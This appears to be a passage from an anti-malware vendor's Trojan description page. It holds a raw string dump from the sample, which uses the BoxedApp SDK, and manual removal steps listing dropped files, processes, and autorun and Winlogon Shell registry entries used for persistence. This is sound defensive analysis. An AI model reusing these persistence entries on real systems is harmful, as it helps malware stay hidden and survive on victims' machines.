: Handles::CreateVirtualKeyHandle() failed
BoxedAppSDK::Registry::Impl::CRegistry::NtCreateKeyInternal
: SearchStartingFromRealKey() failed
: RegTree::IKeyNode::FindValue() failed, hr =
BoxedAppSDK::Registry::Impl::CRegistry::NtDeleteValueKeyInternal
: IVirtualKeyHandle::put_Value() failed, hr =
BoxedAppSDK::Registry::Impl::CRegistry::GetRealKeyLastWriteTime
: NtQueryKey() failed, status =
: NtOpenKey() failed, hr =
BoxedAppSDK::Registry::Impl::CRegistry::HasRealKeySubKeys
: NtEnumerateValueKey() failed when we tried to get name of the node, status =
: IKeyNode::EnumValues() failed, hr =
: Behavior::IVirtualKeyHandle::EnumKeys() failed, hr =
: Behavior::IVirtualKeyHandle::EnumValues() failed, hr =
BoxedAppSDK::Registry::Impl::CRegistry::NtEnumerateValueKeyInternal
BoxedAppSDK::Registry::Impl::CRegistry::NtOpenKeyInternal
: invalid KeyInformationClass passed:
: IVirtualKeyHandle_GetFullPath() failed, hr =
: Behavior::IEnumVirtualKey::GetNext() failed, hr =
: IVirtualKeyHandle::EnumValues() failed, hr =
: IVirtualKeyHandle::EnumKeys() failed, hr =
: IVirtualKeyHandle::get_LastWriteTime() failed, hr =
reg:NtQueryMultipleValueKey(
: IKeyNode::FindValue() failed, hr =
: IVirtualKeyHandle::get_Value() failed, hr =
BoxedAppSDK::Registry::Impl::CRegistry::NtQueryValueKeyInternal
: IVirtualKeyHandle::get_ValueType() failed, hr =
reg:NtSetInformationKey(
RegTree::IKeyNode::RemoveValue() failed, hr
BoxedAppSDK::Registry::Impl::CRegistry::NtSetValueKeyInternal
reg:NtRenameKey(
RegTree::IEnumKeyNode::GetNext(), hr =
RegTree::IKeyNode::EnumKeys(), hr =
: IEnumVirtualKey::GetNext() failed, hr =
BoxedAppSDK::Registry::Impl::CRegistry::NtDeleteKeyInternal
reg:NtDeleteValueKey(
: NtEnumerateKey() failed when we tried to get name of the node, status =
, Behavior::IVirtualKeyHandle::get_Prop() failed, hr =
, Behavior::IVirtualKey::OpenKey() failed, hr =
: IKeyNode::EnumKeys() failed, hr =
BoxedAppSDK::Registry::Impl::CRegistry::NtEnumerateKeyInternal
reg:NtEnumerateValueKey(
reg:NtQueryKey(
reg:NtQueryValueKey(
reg:NtSetValueKey(
reg:NtCreateKey(
reg:NtDeleteKey(
reg:NtEnumerateKey(
reg:NtOpenKey(
GetProcessHeap
GetWindowsDirectoryW
KERNEL32.dll
USER32.dll
RegCloseKey
RegOpenKeyExW
RegDeleteKeyW
RegOpenKeyW
ADVAPI32.dll
OLEAUT32.dll
bxsdk32.dll
d:\build_area\boxedapp_src\src\boxedappsolution\release_full\bxsdk32.pdb
`.rsrc
v2.0.50727
BoxedAppSDK_AppDomainManager.dll
System.Security
.ctor
System.Security.Policy
System.Reflection
System.Runtime.InteropServices
System.Diagnostics
System.Runtime.CompilerServices
System.Collections
System.Security.Permissions
System.IO
DllImportAttribute
shell32.dll
lpCmdLine
1.0.0.0
$87cd9ac9-2a94-4a9b-aee1-8d25d6a19f78
D:\build_area\boxedapp_src\src\BoxedAppSolution\DotNetAppDomainManager\obj\x86\Release_Full\BoxedAppSDK_AppDomainManager.pdb
mscoree.dll
BoxedAppSDKThunk32.dll
d:\build_area\boxedapp_src\src\boxedappsolution\release_full\BoxedAppSDKThunk32.pdb
.reloc
TLSSupport32.dll
d:\build_area\boxedapp_src\src\boxedappsolution\release_full\TLSSupport32.pdb
9 9$9(9,909
4!40484}4
:$:,:5:::{:
?#?2?9?@?
1 1$1(1,1014181
9$=(=,=0=4=8=<=@=
6 6$6(6,6064686<6@6
1"26233'4
4 40454:4
:":2:7:>;
,1014181
8 8$8(8,8
%s_%.8x_%.8x_%.8x
\KernelBase.dll
\.NETFramework\assembly\GAC\BoxedAppSDK_AppDomainManager\1.0.0.0__ef07ce3257ee81c1\BoxedAppSDK_AppDomainManager.dll
\assembly\GAC\BoxedAppSDK_AppDomainManager\1.0.0.0__ef07ce3257ee81c1\BoxedAppSDK_AppDomainManager.dll
%d-%d-%p
:\TLSSupport310D39B571B74d36B95451DD240D8758
",BoxedAppSDK_TryCreateProcessForVirtualEXE_AnotherBitnessPartHelper
\rundll32.exe"
DotNetAppDomainManager.CManagedHost
BoxedAppSDK_AppDomainManager, Version=1.0.0.0, Culture=neutral, PublicKeyToken=ef07ce3257ee81c1
DotNetAppDomainManager.CAppDomainManager
.config
.manifest
",BoxedAppSDK_AttachMixedBitnessProcessHelper
Attempt to launch not executable file:
Unable to find appropriate template exe
comdlg32.dll
\dllhost.exe
hh.exe
find.exe
help.exe
winver.exe
regsvr32.exe
dllhost.exe
ntvdm.exe
tcpsvcs.exe
mpr.dll
Wadvapi32.dll
sxs.dll
Obtain a full version, purchase a license at http://boxedapp.com/boxedappsdk/order.html
%s_%.8x_%.8x
%s_%.8x
boxedapp_msg_process
boxedapp_event_newmsg
boxedapp_msg_global
bxsdk64.dll
:\{9019ACD6-BC11-4308-8C49-92E0601DF38D}\temp\
\DosDevices\pipe\
\Device\NamedPipe\
\??\pipe\
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Time Zones
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Print
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Ports
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Perflib
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkCards
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\LanguagePack
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Gre_Initialize
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontSubstitutes
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Fonts
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontMapper
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontLink
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\FontDpi
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Console
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Telephony\Locations
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\PreviewHandlers
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Group Policy
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\KindMap
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\DriveIcons
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\AutoplayHandlers
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Control Panel\Cursors\Schemes
\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths
\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates
\REGISTRY\MACHINE\SOFTWARE\Microsoft\EnterpriseCertificates
publicKeyToken
Software\Microsoft\Windows\CurrentVersion\SideBySide\Winners\
!"#$%&'()* ,-./0123456789:;<=>?@
3, 3, 5, 0
BoxedApp, BoxedApp SDK, BoxedApp Packer, BoxedApp.com and some others are trademarks (some of them are registered) of Virtualization Technologies Ltd.
BoxedAppSDK.dll

cvtres.exe_3500_rwx_10000000_00001000:




.text
`.rdata
@.reloc

cvtres.exe_3500_rwx_62480000_00001000:




.text
0`.data
.rdata
0@.bss
.edata
0@.idata
.rsrc
.reloc

cvtres.exe_3500_rwx_62E80000_00001000:




.text
P`.data
.rdata
`@.bss
.edata
0@.idata
.rsrc
.reloc


Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):

    WScript.exe:2280
    WScript.exe:3524
    wuauclt.exe:304
    cvtres.exe:2696
    cvtres.exe:3396
    vbc.exe:1128
    vbc.exe:2912
    vbc.exe:2688
    vbc.exe:3780
    vbc.exe:672

  2. Delete the original Trojan file.
  3. Delete or disinfect the following files created/modified by the Trojan:

    %WinDir%\SoftwareDistribution\DataStore\Logs\edb.chk (100 bytes)
    %WinDir%\SoftwareDistribution\DataStore\Logs\edb.log (2232 bytes)
    %WinDir%\SoftwareDistribution\DataStore\DataStore.edb (100 bytes)
    %Documents and Settings%\%current user%\Start Menu\Programs\Startup\Update.Microsoft.com.url (46 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\8DFDF057024880D7A081AFBF6D26B92F (533 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Tar2.tmp (2712 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\E8974A4669383843486E5AFDB09650F5 (224 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\E8974A4669383843486E5AFDB09650F5 (2 bytes)
    C:\NTKernel\load32 (7972 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\C554DCF706A5AAB8B360FAD227EAB9C7 (176 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\2BF68F4714092295550497DD56F57004 (408 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\8DFDF057024880D7A081AFBF6D26B92F (176 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Cab1.tmp (54 bytes)
    %Documents and Settings%\%current user%\My Documents\315load32.exe (2105 bytes)
    %Documents and Settings%\All Users\Application Data\load32.exe (2105 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\C554DCF706A5AAB8B360FAD227EAB9C7 (1 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\62B5AF9BE9ADC1085C3C56EC07A82BF6 (224 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\0797C381B2F87EB5A1D5573BD15BA4F4 (240 bytes)
    C:\NTKernel\63462.exe (32324 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\62B5AF9BE9ADC1085C3C56EC07A82BF6 (126 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\0797C381B2F87EB5A1D5573BD15BA4F4 (37 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\2BF68F4714092295550497DD56F57004 (18 bytes)
    %Documents and Settings%\All Users\Application Data\load32.vbs (873 bytes)
    %System%\wbem\Logs\wbemprox.log (75 bytes)
    C:\NTKernel\nt32.exe (2105 bytes)

  4. Delete the following value(s) in the autorun key (How to Work with System Registry):

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
    "NT Kernel Service" = "C:\NTKernel\nt32.exe -rundll32 /SYSTEM32 C:\Windows\System32\taskmgr.exe %Program Files%\Microsoft\Windows"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
    "NT Kernel Service" = "c:\%original file name%.exe -rundll32 /SYSTEM32 C:\Windows\System32\taskmgr.exe %Program Files%\Microsoft\Windows"

  5. Remove the references to the Trojan by modifying the following registry value(s) (How to Work with System Registry):

    [HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon]
    "Shell" = "explorer.exe,%Documents and Settings%\All Users\Application Data\load32.exe"

  6. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  7. Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

No votes yet


Lavasoft is the maker of Ad-Aware, the world's most popular anti-malware software with over 450 million downloads.
© 2024 Lavasoft. All rights reserved.
Terms Of Use |   Privacy Policy


x

Our best antivirus yet!

Fresh new look. Faster scanning. Better protection.

Enjoy unique new features, lightning fast scans and a simple yet beautiful new look in our best antivirus yet!

For a quicker, lighter and more secure experience, download the all new adaware antivirus 12 now!

Download adaware antivirus 12
No thanks, continue to lavasoft.com
close x

Discover the new adaware antivirus 12

Our best antivirus yet

Download Now